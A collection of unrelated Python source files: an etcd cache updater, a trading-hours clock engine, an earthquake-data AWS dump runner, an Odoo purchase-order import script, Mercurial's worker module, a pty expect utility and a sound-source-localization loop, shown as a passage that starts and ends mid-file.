_etcd_updater: ReusableThread
_root: str
_timeout: int
def __init__(self, host: str, port: int, base: str, timeout: int = 60, callbacks: Callbacks = None):
super().__init__()
self._callbacks = []
if isinstance(callbacks, (list, tuple)):
self._callbacks.extend([f for f in callbacks if isFunction(f)])
self._data = QueryDict()
self._etcd_client = etcd.Client(
host=host,
port=port
)
self._root = base if base.endswith('/') else f'{base}/'
self._timeout = timeout
self._initial()
self._etcd_updater = ReusableThread(target=self._update, kwargs={'wait': True})
        self._etcd_updater.daemon = True  # Thread.setDaemon() is deprecated
self._etcd_updater.start()
@property
def cache(self) -> FrozenDict:
return FrozenDict(self._data)
def shutdown(self) -> None:
self._etcd_updater.join(5)
self._etcd_updater.finish()
# Helper Methods
def _initial(self, base: str = None) -> None:
"""
Get ETCD initial values
"""
root = base or self._root
try:
for k in self._etcd_client.read(root, recursive=True, sorted=True).children:
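                # e.g. with root '/base/', etcd key '/base/app/setting'
                # becomes cache key 'app.setting'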
key = k.key.replace(self._root, '').replace('/', '.')
self._data[key] = k.value
except (etcd.EtcdKeyNotFound, etcd.EtcdWatchTimedOut):
pass
def _update(self, wait: bool = False, base: str = None) -> None:
"""
Get ETCD value updates
"""
root = base or self._root
kwargs = dict(wait=True, timeout=self._timeout) if wait else {}
update = False
try:
for k in self._etcd_client.read(root, recursive=True, sorted=True, **kwargs).children:
update = True
key = k.key.replace(self._root, '').replace('/', '.')
t_id = key.split('.')[0]
if t_id not in self._data:
sleep(0.5)
self._initial(base=f'{root}{t_id}')
else:
if k.value is None:
del self._data[key]
else:
self._data[key] = k.value
except (etcd.EtcdKeyNotFound, etcd.EtcdWatchTimedOut):
pass
if update:
for func in self._callbacks:
func(self.cache)
if self._etcd_updater.is_alive():
self._etcd_updater.join(5)
self._etcd_updater.restart()
else:
self._etcd_updater.start()
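
# A minimal, hedged usage sketch for ReusableThread (not part of the original
# module; running this file directly still requires its imports to resolve).
# Note that join() itself re-arms the next run; see its implementation above.
if __name__ == '__main__':
    def work(tag):
        print('run:', tag)

    t = ReusableThread(target=work, args=('demo',))
    t.start()   # run() triggers the first call on its own
    t.join()    # wait for run 1; join() then schedules run 2
    t.join()    # wait for run 2 (run 3 gets scheduled the same way)
    t.finish()  # set the finish flag and let the thread exit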
|
clock_engine.py
|
# coding: utf-8
import datetime
from collections import deque
from threading import Thread
import pandas as pd
import arrow
from dateutil import tz
import time
from ..easydealutils import time as etime
from ..event_engine import Event
class Clock:
def __init__(self, trading_time, clock_event):
self.trading_state = trading_time
self.clock_event = clock_event
class ClockIntervalHandler:
def __init__(self, clock_engine, interval, trading=True, call=None):
"""
        :param interval: float (minutes)
        :param trading: only fire during trading sessions
:return:
"""
self.clock_engine = clock_engine
self.clock_type = interval
self.interval = interval
self.second = int(interval * 60)
self.trading = trading
self.call = call or (lambda: None)
def is_active(self):
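        # e.g. interval=0.5 gives self.second == 30: the handler is active
        # whenever int(now) is an exact multiple of 30 seconds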
if self.trading:
if not self.clock_engine.trading_state:
return False
return int(self.clock_engine.now) % self.second == 0
def __eq__(self, other):
if isinstance(other, ClockIntervalHandler):
return self.interval == other.interval
else:
return False
def __hash__(self):
return self.second
class ClockMomentHandler:
def __init__(self, clock_engine, clock_type, moment=None, is_trading_date=True, makeup=False, call=None):
"""
:param clock_type:
:param moment: datetime.time
        :param is_trading_date: bool, fire only on trading days
        :param makeup: fire immediately at registration if the trigger moment has already passed
:return:
"""
self.clock_engine = clock_engine
self.clock_type = clock_type
self.moment = moment
self.is_trading_date = is_trading_date
self.makeup = makeup
self.call = call or (lambda: None)
self.next_time = datetime.datetime.combine(
self.clock_engine.now_dt.date(),
self.moment,
)
if not self.makeup and self.is_active():
self.update_next_time()
def update_next_time(self):
"""
        Compute the next activation time.
:return:
"""
if self.is_active():
if self.is_trading_date:
next_date = etime.get_next_trade_date(self.clock_engine.now_dt)
else:
next_date = self.next_time.date() + datetime.timedelta(days=1)
self.next_time = datetime.datetime.combine(
next_date,
self.moment
)
def is_active(self):
if self.is_trading_date and not etime.is_trade_date(self.clock_engine.now_dt):
            # check applies only when the handler fires on trading days
return False
return self.next_time <= self.clock_engine.now_dt
class ClockEngine:
"""
    Clock engine that pushes time events.
    1. Provides a unified now timestamp.
"""
EventType = 'clock_tick'
def __init__(self, event_engine, tzinfo=None):
"""
:param event_engine:
        :param tzinfo: timezone info; defaults to the local timezone
:return:
"""
        # use the local timezone by default
self.tzinfo = tzinfo or tz.tzlocal()
self.event_engine = event_engine
self.is_active = True
self.clock_engine_thread = Thread(target=self.clocktick, name="ClockEngine.clocktick")
self.sleep_time = 1
        now = datetime.datetime.now()
        self.trading_state = etime.is_tradetime(now) and etime.is_trade_date(now)
self.clock_moment_handlers = deque()
self.clock_interval_handlers = set()
self._init_clock_handler()
def _init_clock_handler(self):
"""
        Register the default clock events.
:return:
"""
        # market-open event
def _open():
self.trading_state = True
self._register_moment('open', datetime.time(9, tzinfo=self.tzinfo), makeup=True, call=_open)
        # midday trading break
self._register_moment('pause', datetime.time(11, 30, tzinfo=self.tzinfo), makeup=True)
        # afternoon session opens
self._register_moment('continue', datetime.time(13, tzinfo=self.tzinfo), makeup=True)
        # market-close event
def close():
self.trading_state = False
self._register_moment('close', datetime.time(15, tzinfo=self.tzinfo), makeup=True, call=close)
        # interval events
for interval in (0.5, 1, 5, 15, 30, 60):
self.register_interval(interval)
@property
def now(self):
"""
        Unified interface for the now timestamp.
:return:
"""
return time.time()
@property
def now_dt(self):
"""
        :return: timezone-aware datetime; using the arrow library is recommended
"""
return arrow.get(self.now).to(self.tzinfo)
def start(self):
self.clock_engine_thread.start()
def clocktick(self):
while self.is_active:
self.tock()
time.sleep(self.sleep_time)
def tock(self):
if not etime.is_trade_date(self.now_dt):
            pass  # pause the clock engine on non-trading days
else:
self._tock()
def _tock(self):
        # interval events
for handler in self.clock_interval_handlers:
if handler.is_active():
handler.call()
self.push_event_type(handler)
        # moment (time-of-day) events
while self.clock_moment_handlers:
clock_handler = self.clock_moment_handlers.pop()
if clock_handler.is_active():
clock_handler.call()
self.push_event_type(clock_handler)
clock_handler.update_next_time()
self.clock_moment_handlers.appendleft(clock_handler)
else:
self.clock_moment_handlers.append(clock_handler)
break
def push_event_type(self, clock_handler):
event = Event(event_type=self.EventType, data=Clock(self.trading_state, clock_handler.clock_type))
self.event_engine.put(event)
def stop(self):
self.is_active = False
def is_tradetime_now(self):
"""
        :return: whether the current time is within trading hours
"""
return etime.is_tradetime(self.now_dt)
def register_moment(self, clock_type, moment, makeup=False):
return self._register_moment(clock_type, moment, makeup=makeup)
def _register_moment(self, clock_type, moment, is_trading_date=True, makeup=False, call=None):
handlers = list(self.clock_moment_handlers)
handler = ClockMomentHandler(self, clock_type, moment, is_trading_date, makeup, call)
handlers.append(handler)
        # keep handlers sorted so the earliest next_time is popped first
handlers.sort(key=lambda h: h.next_time, reverse=True)
self.clock_moment_handlers = deque(handlers)
return handler
def register_interval(self, interval_minute, trading=True):
return self._register_interval(interval_minute, trading)
def _register_interval(self, interval_minute, trading=True, call=None):
handler = ClockIntervalHandler(self, interval_minute, trading, call)
self.clock_interval_handlers.add(handler)
return handler
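
# A hedged usage sketch (not part of the original module); assumes an event
# engine object exposing put(event), as used by push_event_type() above:
#
#   engine = ClockEngine(my_event_engine)
#   engine.register_interval(5)                            # fire every 5 minutes
#   engine.register_moment('lunch', datetime.time(12, 0))  # fire daily at 12:00 on trade days
#   engine.start()
#   ...
#   engine.stop()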
|
main.py
|
"""
This is the main file that runs the OpenEEW code package
"""
# import modules
import time
from threading import Thread
import os
from params import params
from src import data_holders, receive_traces, aws
__author__ = "Vaclav Kuna"
__copyright__ = ""
__license__ = ""
__version__ = "1.0"
__maintainer__ = "Vaclav Kuna"
__email__ = "kuna.vaclav@gmail.com"
__status__ = ""
def main():
"""Does everything"""
# Create a dictionary of aws credentials from enviroment variables
aws_cred = {
"AWS_REGION": os.environ["AWS_REGION"],
"ACCESS_KEY_ID": os.environ["ACCESS_KEY_ID"],
"SECRET_ACCESS_KEY": os.environ["SECRET_ACCESS_KEY"],
"BUCKET_NAME": os.environ["BUCKET_NAME"],
}
    # Create a Traces data holder
traces = data_holders.Traces()
# We create and start our traces update worker
stream = receive_traces.DataReceiver(traces)
receive_data_process = Thread(target=stream.run)
receive_data_process.start()
    # We create and start the AWS dump worker
compute = aws.AWSdump(traces=traces, params=params, aws_cred=aws_cred)
aws_process = Thread(target=compute.run)
aws_process.start()
# We join our Threads, i.e. we wait for them to finish before continuing
receive_data_process.join()
aws_process.join()
if __name__ == "__main__":
main()
|
50_po_history.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
# ==================================== PURCHASE ORDER ====================================
def update_purchase_order(pid, data_pool, error_ids, write_ids, partner_ids, term_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
order_no = data.get('ORDR-NUM', '')
partner_id = partner_ids.get(data.get('VEND-CODE', '').strip())
term_id = term_ids.get(data.get('TERM-CODE', '').strip())
if not partner_id or not term_id:
error_ids.append(order_no)
continue
vals={'name': data.get('ORDR-NUM', '').strip(),
'partner_id': partner_id,
'date_order': data.get('ORDR-DATE').strip(),
'release_date': data.get('ORDR-RELEASE-DATE').strip(),
'payment_term_id': term_id,
# 'state': 'purchase'
}
res = write_ids.get(order_no, [])
if res:
sock.execute(DB, UID, PSW, 'purchase.order', 'write', res, vals)
                print(pid, 'UPDATE - PURCHASE ORDER', res)
else:
res = sock.execute(DB, UID, PSW, 'purchase.order', 'create', vals)
print(pid, 'CREATE - PURCHASE ORDER', res, order_no)
if not data_pool:
break
except Exception as e:
print(e)
break
def sync_purchase_orders():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/polhist1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'res.partner', 'search_read', ['|', ('active', '=', False), ('active', '=', True)], ['customer_code'])
vendor = {rec['customer_code']: rec['id'] for rec in res}
partner_ids = manager.dict(vendor)
res = sock.execute(DB, UID, PSW, 'purchase.order', 'search_read', [], ['name'])
write_ids = {rec['name']: rec['id'] for rec in res}
payment_terms = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', [('order_type','=','purchase')], ['id','code'])
term_ids = {term['code']: term['id'] for term in payment_terms}
vendor = None
res = None
payment_terms = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_purchase_order, args=(pid, data_pool, error_ids, write_ids, partner_ids, term_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
sync_purchase_orders()
|
worker.py
|
# worker.py - master-slave parallelism support
#
# Copyright 2013 Facebook, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import os
import signal
import sys
import threading
from .i18n import _
from . import error
def countcpus():
'''try to count the number of CPUs on the system'''
# posix
try:
n = int(os.sysconf('SC_NPROCESSORS_ONLN'))
if n > 0:
return n
except (AttributeError, ValueError):
pass
# windows
try:
n = int(os.environ['NUMBER_OF_PROCESSORS'])
if n > 0:
return n
except (KeyError, ValueError):
pass
return 1
def _numworkers(ui):
s = ui.config('worker', 'numcpus')
if s:
try:
n = int(s)
if n >= 1:
return n
except ValueError:
raise error.Abort(_('number of cpus must be an integer'))
return min(max(countcpus(), 4), 32)
if os.name == 'posix':
_startupcost = 0.01
else:
_startupcost = 1e30
def worthwhile(ui, costperop, nops):
'''try to determine whether the benefit of multiple processes can
outweigh the cost of starting them'''
linear = costperop * nops
workers = _numworkers(ui)
benefit = linear - (_startupcost * workers + linear / workers)
return benefit >= 0.15
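# Worked example (illustrative, not from the original source): on posix with
# 4 workers, costperop=0.001 and nops=1000 give linear = 1.0 and
# benefit = 1.0 - (0.01 * 4 + 1.0 / 4) = 0.71, which clears the 0.15 bar, so
# the work is parallelized; on Windows the huge _startupcost makes
# worthwhile() effectively always answer no.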
def worker(ui, costperarg, func, staticargs, args):
'''run a function, possibly in parallel in multiple worker
processes.
returns a progress iterator
costperarg - cost of a single task
func - function to run
staticargs - arguments to pass to every invocation of the function
args - arguments to split into chunks, to pass to individual
workers
'''
if worthwhile(ui, costperarg, len(args)):
return _platformworker(ui, func, staticargs, args)
return func(*staticargs + (args,))
def _posixworker(ui, func, staticargs, args):
rfd, wfd = os.pipe()
workers = _numworkers(ui)
oldhandler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, signal.SIG_IGN)
pids, problem = [], [0]
for pargs in partition(args, workers):
pid = os.fork()
if pid == 0:
signal.signal(signal.SIGINT, oldhandler)
try:
os.close(rfd)
for i, item in func(*(staticargs + (pargs,))):
os.write(wfd, '%d %s\n' % (i, item))
os._exit(0)
except KeyboardInterrupt:
os._exit(255)
# other exceptions are allowed to propagate, we rely
# on lock.py's pid checks to avoid release callbacks
pids.append(pid)
pids.reverse()
os.close(wfd)
fp = os.fdopen(rfd, 'rb', 0)
def killworkers():
# if one worker bails, there's no good reason to wait for the rest
for p in pids:
try:
os.kill(p, signal.SIGTERM)
except OSError as err:
if err.errno != errno.ESRCH:
raise
def waitforworkers():
for _pid in pids:
st = _exitstatus(os.wait()[1])
if st and not problem[0]:
problem[0] = st
killworkers()
t = threading.Thread(target=waitforworkers)
t.start()
def cleanup():
signal.signal(signal.SIGINT, oldhandler)
t.join()
status = problem[0]
if status:
if status < 0:
os.kill(os.getpid(), -status)
sys.exit(status)
try:
for line in fp:
l = line.split(' ', 1)
yield int(l[0]), l[1][:-1]
except: # re-raises
killworkers()
cleanup()
raise
cleanup()
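# Protocol note (illustrative summary, not in the original): each forked
# child streams its results back over the shared pipe as text lines of the
# form "<index> <item>\n", and the parent generator parses them in the
# `for line in fp` loop above. With two workers over ['a', 'b', 'c'] the
# parent might see an interleaving like "0 a", "2 c", "1 b".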
def _posixexitstatus(code):
'''convert a posix exit status into the same form returned by
os.spawnv
returns None if the process was stopped instead of exiting'''
if os.WIFEXITED(code):
return os.WEXITSTATUS(code)
elif os.WIFSIGNALED(code):
return -os.WTERMSIG(code)
if os.name != 'nt':
_platformworker = _posixworker
_exitstatus = _posixexitstatus
def partition(lst, nslices):
'''partition a list into N slices of roughly equal size
The current strategy takes every Nth element from the input. If
we ever write workers that need to preserve grouping in input
we should consider allowing callers to specify a partition strategy.
mpm is not a fan of this partitioning strategy when files are involved.
In his words:
Single-threaded Mercurial makes a point of creating and visiting
files in a fixed order (alphabetical). When creating files in order,
a typical filesystem is likely to allocate them on nearby regions on
disk. Thus, when revisiting in the same order, locality is maximized
and various forms of OS and disk-level caching and read-ahead get a
chance to work.
This effect can be quite significant on spinning disks. I discovered it
circa Mercurial v0.4 when revlogs were named by hashes of filenames.
Tarring a repo and copying it to another disk effectively randomized
the revlog ordering on disk by sorting the revlogs by hash and suddenly
performance of my kernel checkout benchmark dropped by ~10x because the
"working set" of sectors visited no longer fit in the drive's cache and
the workload switched from streaming to random I/O.
    What we should really be doing is have workers read filenames from an
ordered queue. This preserves locality and also keeps any worker from
getting more than one file out of balance.
'''
for i in range(nslices):
yield lst[i::nslices]
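# A minimal sketch (not part of the original module) of the interleaving:
#
#     >>> list(partition(list(range(10)), 3))
#     [[0, 3, 6, 9], [1, 4, 7], [2, 5, 8]]
#
# Each slice strides through the input, which is exactly the locality hazard
# the docstring above describes for on-disk file ordering.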
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from Queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s' % repr(self.buffer[:])
#s += ' or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data)
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
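    # Note (illustrative): expect() keeps a running `timeleft` budget and
    # subtracts the wall-clock time spent on each match/read pass, so a
    # single call honours `timeout` even when the data arrives in several
    # partial reads from the reader queue.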
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
        while timeleft >= 0:
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536)
queue.put(data)
except:
if kill_event.is_set():
break
raise
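# Minimal usage sketch (illustrative only; the command and expected output
# are assumptions, not part of the module):
#
#     io = spawn(['/bin/bash', '--noediting'])
#     io.timeout(5)
#     io.eol('\n')
#     io.send('echo hello')
#     io.expect('hello')  # raises ExpectTimeoutError if not seen within 5s
#     io.close()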
|
ssl_loop_ac.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Loop thread to run SSL (sound source localization).
"""
from scipy import stats
import numpy as np
from pyaudio import PyAudio, paInt16
from SoundSourceLocalization.ssl_setup import *
from SoundSourceLocalization.ssl_gcc_generator import GccGenerator
# from SoundSourceLocalization.ssl_actor_critic import Actor, Critic
from SoundSourceLocalization.ssl_map import Map
from SoundSourceLocalization.ssl_audio_processor import *
from SoundSourceLocalization.ssl_turning import SSLturning
from SoundSourceLocalization.kws_detector import KwsDetector
import time
import sys
import os
import wave  # needed by savewav_from_frames / read_and_split_channels_from_file
import threading
import random
from lib.utils import standard_normalizaion, add_prefix_and_suffix_4_basename
from lib.audiolib import normalize_single_channel_to_target_level, audio_segmenter_4_numpy, \
audio_energy_ratio_over_threshold, audio_energy_over_threshold, audiowrite, audioread
import ns_enhance_onnx
from SoundSourceLocalization.ssl_DOA_model import DOA
from ssl_actor_critic import ActorCriticNetwork
pwd = os.path.abspath(__file__)
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import Driver.ControlOdometryDriver as CD
class SSL:
def __init__(self, denoise=True, seg_len='256ms', debug=False):
print('-' * 20 + 'init SSL class' + '-' * 20)
# self.KWS = KwsDetector(CHUNK, RECORD_DEVICE_NAME, RECORD_WIDTH, CHANNELS,
# SAMPLE_RATE, FORMAT, KWS_WAVE_PATH, KWS_MODEL_PATH, KWS_LABEL_PATH)
        self.micro_mapping = np.array(range(CHANNELS), dtype=int)  # np.int is removed in modern NumPy
self.denoise = denoise
self.device_index = self.__get_device_index__()
self.frames = []
segment_para_set = {
'32ms' : {
'name' : '32ms',
'time_len' : 32 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'50ms' : {
'name' : '50ms',
'time_len' : 50 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'64ms' : {
'name' : '64ms',
'time_len' : 64 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'128ms': {
'name' : '128ms',
'time_len' : 128 / 1000,
'threshold' : 200, # 100?
'overlap_per': 0.5
},
'256ms': {
'name' : '256ms',
'time_len' : 256 / 1000,
'threshold' : 400,
'overlap_per': 0.67
},
'1s' : {
'name' : '1s',
'time_len' : 1024 / 1000,
'threshold' : 800,
'overlap_per': 0.9
},
}
self.seg_para = segment_para_set[seg_len]
self.debug = debug
self.save_dir_name = ''
ref_audio, _ = audioread('../resource/wav/reference_wav.wav')
self.ref_audio = normalize_single_channel_to_target_level(ref_audio)
self.ref_audio_threshold = (self.ref_audio ** 2).sum() / len(self.ref_audio) / 500
print('Loading denoising model...\n')
self.denoise_model, _ = ns_enhance_onnx.load_onnx_model()
print('Loading DOA model...\n')
self.doa = DOA(model_dir=os.path.abspath('./model/EEGNet/ckpt'))
self.ac = ActorCriticNetwork(n_actions=ACTION_SPACE, name='actor_critic', ini_model=self.doa.model,
ini_model_dir='./model/EEGNet/ckpt',
save_model_dir='./model/actor_critic_model/ckpt')
def __get_device_index__(self):
device_index = -1
# scan to get usb device
p = PyAudio()
print('num_device:', p.get_device_count())
for index in range(p.get_device_count()):
info = p.get_device_info_by_index(index)
device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(RECORD_DEVICE_NAME) != -1:
device_index = index
break
if device_index != -1:
print('-' * 20 + 'Find the device' + '-' * 20 + '\n', p.get_device_info_by_index(device_index), '\n')
del p
else:
print('-' * 20 + 'Cannot find the device' + '-' * 20 + '\n')
exit()
return device_index
def savewav_from_frames(self, filename, frames=None):
if frames is None:
frames = self.frames
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(RECORD_WIDTH)
wf.setframerate(SAMPLE_RATE)
wf.writeframes(b''.join(frames))
wf.close()
def save_multi_channel_audio(self, des_dir, audio, fs=SAMPLE_RATE, norm=True, ):
for i in range(len(audio)):
file_path = os.path.join(des_dir, 'test_mic%d.wav' % i)
audiowrite(file_path, audio[i], sample_rate=fs, norm=norm, target_level=-25, clipping_threshold=0.99)
def read_multi_channel_audio(self, dir_path, num_channel=CHANNELS):
audio = []
for i in range(num_channel):
file_path = os.path.join(dir_path, 'test_mic%d.wav' % i)
audio_i, _ = audioread(file_path, )
audio.append(audio_i)
return np.array(audio)
def read_and_split_channels_from_file(self, filepath):
f = wave.open(filepath)
params = f.getparams()
num_channel, sample_width, fs, num_frame = params[:4]
str_data = f.readframes(num_frame)
f.close()
audio = np.frombuffer(str_data, dtype=np.short)
        audio = np.reshape(audio, (-1, num_channel)).T
return audio
def split_channels_from_frames(self, frames=None, num_channel=CHANNELS, mapping_flag=True):
if frames is None:
frames = self.frames
audio = np.frombuffer(b''.join(frames), dtype=np.short)
audio = np.reshape(audio, (-1, num_channel)).T
if mapping_flag:
audio = audio[self.micro_mapping]
return audio
def monitor_from_4mics(self, record_seconds=RECORD_SECONDS):
# print('-' * 20 + "start monitoring ...")
p = PyAudio()
stream = p.open(format=p.get_format_from_width(RECORD_WIDTH),
channels=CHANNELS,
rate=SAMPLE_RATE,
input=True,
input_device_index=self.device_index)
# 16 data
frames = []
for i in range(int(SAMPLE_RATE / CHUNK * record_seconds)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
# print('-' * 20 + "End monitoring ...\n")
return frames
def monitor_audio_and_return_amplitude_ratio(self, mapping_flag):
frames = self.monitor_from_4mics(record_seconds=1)
audio = self.split_channels_from_frames(frames=frames, num_channel=CHANNELS, mapping_flag=mapping_flag)
amp2_sum = np.sum(standard_normalizaion(audio) ** 2, axis=1).reshape(-1)
amp2_ratio = amp2_sum / amp2_sum.sum()
return amp2_ratio
def init_micro_mapping(self, ):
print('Please tap each microphone clockwise from the upper left corner ~ ')
mapping = [None, ] * 4
while True:
for i in range(CHANNELS):
while True:
ratio = self.monitor_audio_and_return_amplitude_ratio(mapping_flag=False)
idx = np.where(ratio > 0.5)[0]
if len(idx) == 1 and (idx[0] not in mapping):
mapping[i] = idx[0]
print(' '.join(['Logical channel', str(i), 'has been set as physical channel', str(mapping[i]),
'Amplitude**2 ratio: ', str(ratio)]))
break
print('Final mapping: ')
print('Logical channel: ', list(range(CHANNELS)))
print('Physical channel: ', mapping)
break
confirm_info = input('Confirm or Reset the mapping? Press [y]/n :')
if confirm_info in ['y', '', 'yes', 'Yes']:
break
else:
print('The system will reset the mapping')
continue
self.micro_mapping = np.array(mapping)
    def save_wav(self, filepath):
        # NOTE: self.Voice_String is expected to be set by the caller; it is
        # not initialized in this class.
        wf = wave.open(filepath, 'wb')
        wf.setnchannels(1)
        wf.setsampwidth(2)
        wf.setframerate(SAMPLE_RATE)
        wf.writeframes(np.array(self.Voice_String).tobytes())
        wf.close()
def drop_audio_per_seg_point(self, signal_segment, ):
        '''
        Decide whether to drop a segment; it is kept only when both checks pass:
            1. audio_energy_over_threshold
            2. audio_energy_ratio_over_threshold
        '''
signal_mean = signal_segment.mean(axis=0)
return not (audio_energy_over_threshold(signal_mean, threshold=self.ref_audio_threshold, ) and
audio_energy_ratio_over_threshold(signal_mean, fs=SAMPLE_RATE,
threshold=self.seg_para['threshold'], ))
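    # Illustrative numbers (taken from the tables above, not new logic): with
    # the default '256ms' segments the energy-ratio threshold is 400, and the
    # absolute floor is (ref_audio ** 2).sum() / len(ref_audio) / 500 derived
    # from the reference wav, so both silence and broadband noise are dropped.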
def save_continuous_True(self, ini_list, num=3): # todo
pass
def drop_audio_clips(self, signal_segments, ):
# print('Number of segments before dropping: ', len(signal_segments))
audio_segments = []
drop_flag = []
for i in range(len(signal_segments)):
drop_flag.append(self.drop_audio_per_seg_point(signal_segments[i]))
if not drop_flag[-1]:
audio_segments.append(signal_segments[i])
else:
continue
# audio_segments.append([])
# print('Number of segments after dropping: ', len(audio_segments))
return np.array(audio_segments), drop_flag
def concat_ref_audio(self, audios, ref_audio):
res_audio = []
for i in audios:
res_audio.append(np.concatenate((ref_audio, i)))
return np.array(res_audio)
def del_ref_audio(self, audios, ref_audio):
audios = np.array(audios)
length = len(ref_audio)
return audios[:, length:]
def norm_batch_audio_to_target_level(self, audio_batch):
res_audio = []
for audio_channels in audio_batch:
norm_audio_channels = []
for audio in audio_channels:
norm_audio_channels.append(normalize_single_channel_to_target_level(audio))
res_audio.append(norm_audio_channels)
return np.array(res_audio)
def preprocess_ini_signal(self, ini_signals):
# todo how to denoise when nobody is talking
ini_signals = np.array(ini_signals, dtype=np.float64)
norm_signals = self.norm_batch_audio_to_target_level([ini_signals])[0]
# des_dir = os.path.join(WAV_PATH, self.save_dir_name, 'norm_ini_signal')
# self.save_multi_channel_audio(des_dir, norm_signals, fs=SAMPLE_RATE, norm=True, )
# norm_signals = self.concat_ref_audio(norm_signals, self.ref_audio)
# des_dir = os.path.join(WAV_PATH, self.save_dir_name, 'concat_norm_ini_signal')
# self.save_multi_channel_audio(des_dir, norm_signals, fs=SAMPLE_RATE, norm=True, )
denoised_norm_signals = [
ns_enhance_onnx.denoise_nsnet2(audio=signal, fs=SAMPLE_RATE, model=self.denoise_model, )
for signal in norm_signals]
# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=False, )
# denoised_norm_signals = self.del_ref_audio(denoised_norm_signals, self.ref_audio)
# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'del_denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=False, )
